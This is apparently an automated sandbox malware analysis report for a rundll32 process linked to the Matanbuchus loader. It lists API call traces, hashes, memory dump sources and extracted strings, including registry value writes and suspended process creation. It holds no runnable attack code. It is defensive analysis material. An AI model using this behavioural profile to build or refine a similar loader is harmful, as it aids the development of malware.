                                                  • Part of subcall function 7F301EEC: GetLastError.KERNEL32(?,00000008,7F30699C), ref: 7F301EF0
                                                  • Part of subcall function 7F301EEC: SetLastError.KERNEL32(00000000,00000000,0000000B,000000FF), ref: 7F301F92
                                                • EnumSystemLocalesW.KERNEL32(7F30A4E8,00000001,00000001,?,?,7F30AD53,-00000050,?,?,?,00000055,?,-00000050,?,?,00000001), ref: 7F30A5C6
                                                • API ID: ErrorLast$EnumLocalesSystem
                                                APIs
                                                • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,7F303498,?,20001004,00000000,00000002,?,?,7F302A9A), ref: 7F3043E2
                                                • API ID: InfoLocale
                                                • API ID: __aullrem
                                                • String ID: N/A
                                                • String ID: e
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6da16525bf5588034099ad3ebae02f39126e56f85074f42ce83d4094566c102d
                                                • Instruction ID: b49d0fa2ad456211c22116f4644a3f9e0b0a110e57d52a8cd5d71e702ec7a217
                                                • Opcode Fuzzy Hash: 6da16525bf5588034099ad3ebae02f39126e56f85074f42ce83d4094566c102d
                                                • Instruction Fuzzy Hash: 62818FB8E04259DFCB04CF98C590AEDFBB1BF48304F2081AAD855AB355D734AA85CF94
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6750dc95a881e0ba319b8d51a47873d370098e00a8ed0d55af29bcb13d909daf
                                                • Instruction ID: 22e113f82f7bea3905889378a17e02e717570f53ba443112a2c1d22e888d4876
                                                • Opcode Fuzzy Hash: 6750dc95a881e0ba319b8d51a47873d370098e00a8ed0d55af29bcb13d909daf
                                                • Instruction Fuzzy Hash: EC719074E10219CBCB18CF99C490AEDFBB2FF48350F24819AD855A7355E734AA81CF60
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a81ac5fefb6689b28e7d3d515c49c4fbaa181e5f075f0e7c0c759a794e5351dc
                                                • Instruction ID: 08aff5a1d4c688f67075ef3582702b5bf3335a689e32aa4e3afdb8ee7335260f
                                                • Opcode Fuzzy Hash: a81ac5fefb6689b28e7d3d515c49c4fbaa181e5f075f0e7c0c759a794e5351dc
                                                • Instruction Fuzzy Hash: BC617E78E04259DFCB18CF99C590AADFBB2FF88304F24825AD815AB355D734AA45CF90
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 62509378abaa459587042215145ccaa329c69774e4d554f83ed17055aacb7123
                                                • Instruction ID: 941f565744d68865d5556d750667e97871ed9d87f2689a202cbef29c48d1cc61
                                                • Opcode Fuzzy Hash: 62509378abaa459587042215145ccaa329c69774e4d554f83ed17055aacb7123
                                                • Instruction Fuzzy Hash: D1617FB8E04259DFCB04CFA8C490AADFBB1FF48304F24815AE855AB345D735AA42CF90
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 63d9b7352c91426c1e9df31a8ec6d5464a276f1ee343c2667d0553c946bc237c
                                                • Instruction ID: 467a3abf1d0a69a414e5a81044fa7061ef955a4b60fd4533e7a3b89696777832
                                                • Opcode Fuzzy Hash: 63d9b7352c91426c1e9df31a8ec6d5464a276f1ee343c2667d0553c946bc237c
                                                • Instruction Fuzzy Hash: 7F310335909BC29FD30ECA3189530E6FFB4BE93254BA571AB8446C5C62C32CAC75CB91
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a30358e5d4e52a5d7c6a3b09ff20074403529a4c50b9fe4cd1eb4df955bf9e59
                                                • Instruction ID: 6eb1681bfa8114f055fae5ca32b4c89e480960938dd2fc80dcad830da7195f5e
                                                • Opcode Fuzzy Hash: a30358e5d4e52a5d7c6a3b09ff20074403529a4c50b9fe4cd1eb4df955bf9e59
                                                • Instruction Fuzzy Hash: FF31F735909BC29FD30ECA3589530E6FFB4BE83254BA571AB8456C5C62C32CAC75CB91
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: fa64db1eadf16db7c12d5b0a91ca6391b56afdc97e1fb92eba81a4a822b16940
                                                • Instruction ID: 641c1e4feb9c3bf93bb70384289e94b52cb89d65b407c768084094e9a52640ae
                                                • Opcode Fuzzy Hash: fa64db1eadf16db7c12d5b0a91ca6391b56afdc97e1fb92eba81a4a822b16940
                                                • Instruction Fuzzy Hash: 1431F535909BC29FD30ECA3189530E6FFA4BE83254BA571AB8456C5C62C328AC75CB91
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6e382d9ef216e2dbf16e1f7e7282563c8ae677cf55728833ff5d7bd28b657e76
                                                • Instruction ID: 2c9cdfe8f7fc0a19e2fd379d3dabfed11885027fd7b0229f65d4cdfdc166aacd
                                                • Opcode Fuzzy Hash: 6e382d9ef216e2dbf16e1f7e7282563c8ae677cf55728833ff5d7bd28b657e76
                                                • Instruction Fuzzy Hash: 0831E135909BC79FD30ECA3189530E6FFA4FE83250BA571AA8456C5C61C32CAC76CB91
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b01410e0dba8f240bc758d1c0410acb355e1b4e9885cd2020f8f85382faeb3db
                                                • Instruction ID: e458456dfe5b709abda07aa4d0b21ba1a62138a8220d0a0a8f4b83be44c2d62d
                                                • Opcode Fuzzy Hash: b01410e0dba8f240bc758d1c0410acb355e1b4e9885cd2020f8f85382faeb3db
                                                • Instruction Fuzzy Hash: D631D935905BC79FD30ECA3289530EAFFA4FE83254BA5716A8456C1C21C328AC76CB91
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                • Instruction ID: 001f3b5dc5ceead0f41e5848d62bf60d516f5dea4a08582f3285faafd292eafc
                                                • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                • Instruction Fuzzy Hash: DD11E7B737538343E705893DD8B06E6E7F9EBC6231BE9437AD0838B658D326B1459A00
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 91debf21ff5fab131bb9820310f3a6b076498c3c8a87913a49044508fcd54c38
                                                • Instruction ID: cbd45dea4ab4c185b480a94359f178e2393fe56988ba2740ab8700f623a7ffb3
                                                • Opcode Fuzzy Hash: 91debf21ff5fab131bb9820310f3a6b076498c3c8a87913a49044508fcd54c38
                                                • Instruction Fuzzy Hash: 3BF06D726603649BC712EA6CC504BA973FEE709A52F1151A7B602DB350C2A0EF40C7D0
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 045c068c9b4993117c9950ff781f0dc352064a25b1db4508318fbc32f48eaee0
                                                • Instruction ID: d4dfe57d59965f114fa1ac9ef1790a5609f37823124f8eee29ada10cfde2db0e
                                                • Opcode Fuzzy Hash: 045c068c9b4993117c9950ff781f0dc352064a25b1db4508318fbc32f48eaee0
                                                • Instruction Fuzzy Hash: 9AF0A4329003189BDB61DF68CC4CF86B3BCEB50210FE10560D579E7461E734F9458A80
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: cc02d778fd2513b72d452b4c73495b99cd35a046eec70408820e05d4955fe1e3
                                                • Instruction ID: b3e4bcf7cc95d955a8f49e7281769063c540d0da23000178a1e99c5c672879c8
                                                • Opcode Fuzzy Hash: cc02d778fd2513b72d452b4c73495b99cd35a046eec70408820e05d4955fe1e3
                                                • Instruction Fuzzy Hash: 13F03072A20264DBCB16DA4CC545A4973FEEB45B55F210097F502DB240D6B0EE00C7D0
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 743f8f6ed7d3dafc849b8407b333ca00744b702c402de91a5cb1d0c5c83d8951
                                                • Instruction ID: 11f831741e76d6807851fea90c34dec29040436d0fef31054127ba624cf9d9fe
                                                • Opcode Fuzzy Hash: 743f8f6ed7d3dafc849b8407b333ca00744b702c402de91a5cb1d0c5c83d8951
                                                • Instruction Fuzzy Hash: AEE08C329212B8EBCB15EBD8C904D9AB3FDEB49B01B1104A7B902D3200C270DF00CBC0
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 3d38f8285bf4b725786fbd66e075ee47408d2e1b61d09f82d003a7d56089bb9f
                                                • Instruction ID: c141f89ab75db02ef793797caae37c360648a3028e45eb64309b546814695c2e
                                                • Opcode Fuzzy Hash: 3d38f8285bf4b725786fbd66e075ee47408d2e1b61d09f82d003a7d56089bb9f
                                                • Instruction Fuzzy Hash: F6C040781557C0CACD19551085717AD3367E795A86F5014CEC5074FA41D51D6C46DF11
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 517683b43767a3535c157b2b51665dec237b95770994ae3f6177b6cbaedc1245
                                                • Instruction ID: 7cacbbe88ecc4cab0eaef6d20cf23e499f9f73f380761552353fd898b1fb0951
                                                • Opcode Fuzzy Hash: 517683b43767a3535c157b2b51665dec237b95770994ae3f6177b6cbaedc1245
                                                • Instruction Fuzzy Hash: 14D0127490560CEBC704CF49D540959F7F8EB48650F208199EC0C83700D632AE01CA80
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5b0d8a4e177a3fa34641ad4046624ba9fb0ebdcef63e2a9b0089d13ea34cf4d4
                                                • Instruction ID: 0230c4de2727f5ca7c94c7bd14938b1f1fc6463ea35c1893f292ab52552c7abd
                                                • Opcode Fuzzy Hash: 5b0d8a4e177a3fa34641ad4046624ba9fb0ebdcef63e2a9b0089d13ea34cf4d4
                                                • Instruction Fuzzy Hash: 8CB011322A2B88CBC202CA8CE080E80B3ECE308E20F0000A0E80883B22C228FC00C880
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: *$+$,$1$7$7$;$>$X$i$ivh$u$w
                                                • API String ID: 0-285284801
                                                APIs
                                                • GetModuleHandleExW.KERNEL32(00000006,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 7F2FED54
                                                • GetModuleFileNameW.KERNEL32(?,?,00000105,?,?,?,?,?,?,?,?,?,?,?,?), ref: 7F2FED78
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Module$FileHandleName
                                                • String ID: (Press Retry to debug the application - JIT must be enabled)$...$<program name unknown>$Assertion failed!$Expression: $File: $For information on how your program can cause an assertionfailure, see the Visual C++ documentation on asserts$Line: $Program: $\
                                                • API String ID: 4146042529-3261600717
                                                APIs
                                                Strings
                                                • B:\Loader\Matanbuchus\Main module\Belial project\MatanbuchusLoader\MatanbuchusLoaderFiles\Matanbuchus\json.hpp, xrefs: 7F29C27E, 7F29C424
                                                • @, xrefs: 7F29C40D
                                                • d, xrefs: 7F29C445
                                                • d, xrefs: 7F29C2E0
                                                • n_chars < number_buffer.size() - 1, xrefs: 7F29C429
                                                • d, xrefs: 7F29C39C
                                                • x < 0 and x < (std::numeric_limits<number_integer_t>::max)(), xrefs: 7F29C283
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: __aullrem
                                                • String ID: @$B:\Loader\Matanbuchus\Main module\Belial project\MatanbuchusLoader\MatanbuchusLoaderFiles\Matanbuchus\json.hpp$d$d$d$n_chars < number_buffer.size() - 1$x < 0 and x < (std::numeric_limits<number_integer_t>::max)()
                                                • API String ID: 3758378126-3644039597
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: __aulldiv__aullrem
                                                • String ID: @$B:\Loader\Matanbuchus\Main module\Belial project\MatanbuchusLoader\MatanbuchusLoaderFiles\Matanbuchus\json.hpp$d$d$d$false$n_chars < number_buffer.size() - 1
                                                • API String ID: 3839614884-178659603
                                                APIs
                                                • RegOpenKeyExW.ADVAPI32(80000001,SOFTWARE,00000000,000F003F,00000000,00000044,00000000), ref: 7F2EEF39
                                                • wsprintfW.USER32 ref: 7F2EEF86
                                                • RegCreateKeyExW.ADVAPI32(00000000,?,00000000,00000000,00000000,000F003F,00000000,00000000,00000000), ref: 7F2EEFA3
                                                • RegSetValueExW.ADVAPI32(00000000,bbb,00000000,00000003,00000000,?), ref: 7F2EEFC4
                                                • RegSetValueExW.ADVAPI32(00000000,kkk,00000000,00000003,?,0000000F), ref: 7F2EEFE4
                                                • RegCloseKey.ADVAPI32(00000000), ref: 7F2EEFFD
                                                • RegCloseKey.ADVAPI32(00000000), ref: 7F2EF008
                                                  • Part of subcall function 7F2EF6E7: GetTickCount.KERNEL32 ref: 7F2EF705
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CloseValue$CountCreateOpenTickwsprintf
                                                • String ID: %s_%x%x$SOFTWARE$bbb$kkk
                                                • API String ID: 730945307-550109914
                                                APIs
                                                • GetCurrentProcess.KERNEL32(?), ref: 7F2EF149
                                                • IsWow64Process.KERNEL32(00000000), ref: 7F2EF150
                                                • CreateProcessW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 7F2EF18C
                                                • wsprintfW.USER32 ref: 7F2EF21A
                                                • CloseHandle.KERNEL32(00000000), ref: 7F2EF3A5
                                                • CloseHandle.KERNEL32(00000000), ref: 7F2EF3B0
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Process$CloseHandle$CreateCurrentWow64wsprintf
                                                • String ID: 0x%x$?
                                                • API String ID: 3386633596-4137330559
                                                APIs
                                                • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,7F30FF5F), ref: 7F31060C
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: DecodePointer
                                                • String ID: acos$asin$exp$log$log10$pow$sqrt
                                                • API String ID: 3527080286-3064271455
                                                APIs
                                                • type_info::operator==.LIBVCRUNTIME ref: 7F2F42D0
                                                • ___TypeMatch.LIBVCRUNTIME ref: 7F2F43DE
                                                • _UnwindNestedFrames.LIBCMT ref: 7F2F4530
                                                • CallUnexpected.LIBVCRUNTIME ref: 7F2F454B
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                • String ID: csm$csm$csm
                                                • API String ID: 2751267872-393685449
                                                APIs
                                                • _ValidateLocalCookies.LIBCMT ref: 6C35FEB7
                                                • ___except_validate_context_record.LIBVCRUNTIME ref: 6C35FEBF
                                                • _ValidateLocalCookies.LIBCMT ref: 6C35FF48
                                                • __IsNonwritableInCurrentImage.LIBCMT ref: 6C35FF73
                                                • _ValidateLocalCookies.LIBCMT ref: 6C35FFC8
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944388836.000000006C331000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C330000, based on PE: true
                                                • Associated: 00000004.00000002.2944371980.000000006C330000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 00000004.00000002.2944414571.000000006C36B000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 00000004.00000002.2944431948.000000006C37A000.00000004.00000001.01000000.00000006.sdmp
                                                • Associated: 00000004.00000002.2944500505.000000006C58D000.00000004.00000001.01000000.00000006.sdmp
                                                • Associated: 00000004.00000002.2944585375.000000006C827000.00000004.00000001.01000000.00000006.sdmp
                                                • Associated: 00000004.00000002.2944607422.000000006C828000.00000002.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6c330000_rundll32.jbxd
                                                Similarity
                                                • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                • String ID: csm$csm
                                                • API String ID: 1170836740-3733052814
                                                APIs
                                                • IsCharLowerA.USER32(00000073), ref: 7F2EC78A
                                                • GetModuleFileNameW.KERNEL32(00000000,kernel32,00000000), ref: 7F2EC7AA
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CharFileLowerModuleName
                                                • String ID: 9mD$kernel32$u${
                                                • API String ID: 515556390-2230072418
                                                APIs
                                                • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 6C354DE7
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944388836.000000006C331000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C330000, based on PE: true
                                                • Associated: 00000004.00000002.2944371980.000000006C330000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 00000004.00000002.2944414571.000000006C36B000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 00000004.00000002.2944431948.000000006C37A000.00000004.00000001.01000000.00000006.sdmp
                                                • Associated: 00000004.00000002.2944500505.000000006C58D000.00000004.00000001.01000000.00000006.sdmp
                                                • Associated: 00000004.00000002.2944585375.000000006C827000.00000004.00000001.01000000.00000006.sdmp
                                                • Associated: 00000004.00000002.2944607422.000000006C828000.00000002.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6c330000_rundll32.jbxd
                                                Similarity
                                                • API ID: DirectorySystem
                                                • String ID: ($8$?2$GB$r
                                                • API String ID: 2188284642-435796455
                                                APIs
                                                • _ValidateLocalCookies.LIBCMT ref: 7F2F3C17
                                                • ___except_validate_context_record.LIBVCRUNTIME ref: 7F2F3C1F
                                                • _ValidateLocalCookies.LIBCMT ref: 7F2F3CA8
                                                • __IsNonwritableInCurrentImage.LIBCMT ref: 7F2F3CD3
                                                • _ValidateLocalCookies.LIBCMT ref: 7F2F3D28
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                • String ID: csm
                                                • API String ID: 1170836740-1018135373
                                                APIs
                                                • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 6C35D09A
                                                • Sleep.KERNEL32(00000064), ref: 6C35D0A7
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944388836.000000006C331000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C330000, based on PE: true
                                                • Associated: 00000004.00000002.2944371980.000000006C330000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 00000004.00000002.2944414571.000000006C36B000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 00000004.00000002.2944431948.000000006C37A000.00000004.00000001.01000000.00000006.sdmp
                                                • Associated: 00000004.00000002.2944500505.000000006C58D000.00000004.00000001.01000000.00000006.sdmp
                                                • Associated: 00000004.00000002.2944585375.000000006C827000.00000004.00000001.01000000.00000006.sdmp
                                                • Associated: 00000004.00000002.2944607422.000000006C828000.00000002.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6c330000_rundll32.jbxd
                                                Similarity
                                                • API ID: DirectorySleepWindows
                                                • String ID: )$X$Z$t
                                                • API String ID: 1499897475-3436847989
                                                APIs
                                                • std::bad_exception::bad_exception.LIBCMTD ref: 7F2E3EFF
                                                • std::bad_exception::bad_exception.LIBCMTD ref: 7F2E3F19
                                                • std::bad_exception::bad_exception.LIBCMTD ref: 7F2E3F33
                                                • std::bad_exception::bad_exception.LIBCMTD ref: 7F2E3F4D
                                                Strings
                                                • B:\Loader\Matanbuchus\Main module\Belial project\MatanbuchusLoader\MatanbuchusLoaderFiles\Matanbuchus\json.hpp, xrefs: 7F2E3F69
                                                • false, xrefs: 7F2E3F6E
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: std::bad_exception::bad_exception
                                                • String ID: B:\Loader\Matanbuchus\Main module\Belial project\MatanbuchusLoader\MatanbuchusLoaderFiles\Matanbuchus\json.hpp$false
                                                • API String ID: 2160870905-4036550669
                                                APIs
                                                • std::bad_exception::bad_exception.LIBCMTD ref: 7F2E3DDF
                                                • std::bad_exception::bad_exception.LIBCMTD ref: 7F2E3DF9
                                                • std::bad_exception::bad_exception.LIBCMTD ref: 7F2E3E13
                                                • std::bad_exception::bad_exception.LIBCMTD ref: 7F2E3E2D
                                                Strings
                                                • B:\Loader\Matanbuchus\Main module\Belial project\MatanbuchusLoader\MatanbuchusLoaderFiles\Matanbuchus\json.hpp, xrefs: 7F2E3E49
                                                • false, xrefs: 7F2E3E4E
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: std::bad_exception::bad_exception
                                                • String ID: B:\Loader\Matanbuchus\Main module\Belial project\MatanbuchusLoader\MatanbuchusLoaderFiles\Matanbuchus\json.hpp$false
                                                • API String ID: 2160870905-4036550669
                                                APIs
                                                • FreeLibrary.KERNEL32(00000000,?,7F30413B,7F301108,0000000C,7F3152A0,00000000,00000000,?,7F304388,00000021,FlsSetValue,7F31D860,7F31D868,7F3152A0), ref: 7F3040EF
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: FreeLibrary
                                                • String ID: api-ms-$ext-ms-
                                                • API String ID: 3664257935-537541572
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944388836.000000006C331000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C330000, based on PE: true
                                                • Associated: 00000004.00000002.2944371980.000000006C330000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 00000004.00000002.2944414571.000000006C36B000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 00000004.00000002.2944431948.000000006C37A000.00000004.00000001.01000000.00000006.sdmp
                                                • Associated: 00000004.00000002.2944500505.000000006C58D000.00000004.00000001.01000000.00000006.sdmp
                                                • Associated: 00000004.00000002.2944585375.000000006C827000.00000004.00000001.01000000.00000006.sdmp
